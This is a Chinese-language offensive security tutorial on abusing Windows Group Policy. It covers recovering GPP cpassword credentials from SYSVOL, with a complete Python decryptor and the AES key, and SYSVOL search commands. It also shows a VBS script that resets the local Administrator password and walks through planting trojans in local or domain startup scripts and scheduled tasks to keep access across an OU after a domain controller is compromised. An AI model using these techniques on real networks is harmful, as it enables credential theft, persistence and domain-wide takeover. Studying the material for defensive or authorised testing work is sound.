-
关于组策略
组策略可以控制用户帐户和计算机帐户的工作环境。组策略提供了操作系统、应用程序和活动目录中用户设置的集中化管理和配置。可以设置一次组策略然后在多台计算机上使用。
大多数组织机构为了安全,可能都会要求修改密码,标准的做法是利用组策略批量设置工作站的本地 Administrator 密码,这样带来的问题就是如果黑客拿到了一个系统的 Administrator 认证凭据,就能拿到所有机器的权限。
其中一种解决方法就是使用 SYSVOL(活动目录中的全域共享文件夹),可以在所有域控中进行自动同步和共享,所有认证用户都可以读取,其中包括登录脚本,组策略数据和其他域控所需要的域数据。位置:\<domain>\SYSVOL\<domain>\Policies\</domain></domain>
在 win2008 中发布了 GPP(组策略偏好),GPP 提供了一个自动化机制,利用显式凭据结合组策略部署了计划任务,一次性批量更改了电脑的本地管理的密码。
当管理创建了一个新的 GPP 时,SYSVOL 里有一个 XML 文件存放了 AES-256 加密后的密码,但微软却在 2012 年发布了 AES 的私钥。。。
因为所有域用户对 SYSVOL 都有读权限,在域里的任何用户可以搜索 SYSVOL 共享中的带有 cpassword 字样的 XML 文件,里面包含了 AES 加密的密码。 -
利用本地组策略加载后门
gpedit.msc->本地组策略编辑器->window设置(system)->脚本->启动
可以在里面添加木马(复制到 C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup)或者 ps1 脚本文件。
重启后 cs 上线
-
域组策略
机器有域环境的话,系统管理工具会多出组策略管理功能,域管理员能够很方便统一地对域内的机器和用户进行统一管理。
AD域中两个默认的共享文件夹:SYSVOL NETLOGONNETLOGON目录 挂载点:SYSVOL\domain\SCRIPTS 主要存放的是一些脚本信息,是AD活动目录安装时候自动创建的,是在sysvol下面的一个子目录文件夹 SYSVOL目录 SYSVOL目录是AD域中的一个共享文件夹,该文件夹在AD活动目录安装时候被创建。通常用来存放组策略数据 和 一些脚本 配置文件,这些策略和脚本将用于传递给域成员机器。
-
域组策略的利用
直接执行脚本
和本地组策略的利用类似,在组策略编辑器中添加一个启动脚本strComputer = "." Set objUser = GetObject("WinNT://" & strComputer & "/Administrator, user") objUser.SetPassword "123QWE!@#" objUser.SetInfo
然后强制更新组策略
gpupdate /force
最后查找到被更新的组策略
shell for /r \\dc/sysvol %i in (*.vbs) do @echo %i shell for /r \\dc/sysvol %i in (*.bat) do @echo %i
GPP漏洞的利用
直接执行脚本只能在 win server 2008 上没打补丁的版本存在,以后的版本无法写入密码,因为如果使用 GPP,输入的用户密码都会以 AES-256 的方式存在 SYSVOL 下对应的 xml 文件中,但在高版本 GPP 就不能输入密码,这个洞也就无了。
现在的攻击手法就是获取 GPP 泄露的密码:
在组策略管理中新建一个 OU 组:
在这个 OU 中新建一个使用了 GPP 的本地用户密码的策略,并获取到该 GPO 的 ID
方便演示添加一个新的用户
然后根据这个 ID 到 SYSVOL 中搜索C:\Windows\SYSVOL\sysvol\god.org\Policies\{2559CA36-02A9-4C7A-AC1F-553AC2C1A567}\Machine\Preferences\Groups
可以看到 gpptest 用户名对应的加密密码,这里用 python 脚本解密一下#!/usr/bin/python # # Gpprefdecrypt - Decrypt the password of local users added via Windows 2008 Group Policy Preferences. # # This tool decrypts the cpassword attribute value embedded in the Groups.xml file stored in the domain controller's Sysvol share. # import sys from Crypto.Cipher import AES from base64 import b64decode # Init the key # From MSDN: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2 key = """ 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b """.replace(" ","").replace("\n","").decode('hex') # Add padding to the base64 string and decode it cpassword = "AOXP8WcaNw/4jbOKeBQ/zubT3+T5UWA8P7EFVNEh2+E" cpassword += "=" * ((4 - len(cpassword) % 4) % 4) password = b64decode(cpassword) # Decrypt the password o = AES.new(key, AES.MODE_CBC, "\x00" * 16).decrypt(password) # Print it print o[:-ord(o[-1])].decode('utf16')
-
敏感文件搜集
1.命令行下搜索
dir /s /a \\DC\SYSVOL\*.xml
2.Get-GPPPassword.ps1
运行后会自动遍历 SYSVOL 下的敏感文件并将密码解密。
3.通过用户进行查找查看域内共享 get-domaincomputer|get-netshare 查看域用户信息 Get-DomainUser -identity gpptest 查看该用户的组信息 Get-DomainOU
发现 GPO 的 link 链接,直接去找对应的文件夹就可以了
-
后门利用
当拿下域控的时候可以用 GPP 指定控制 OU 下的所有用户
1.直接写脚本
直接把木马脚本放在域策略,或新建 GPO 在启动中放入木马,然后将该 GPO 连接到目标 OU 下就可以直接打。
2.计划任务实现远程执行
可定时收集信息且比较隐蔽,使用 New-GPOImmediateTask.ps1 完成。 -
参考文献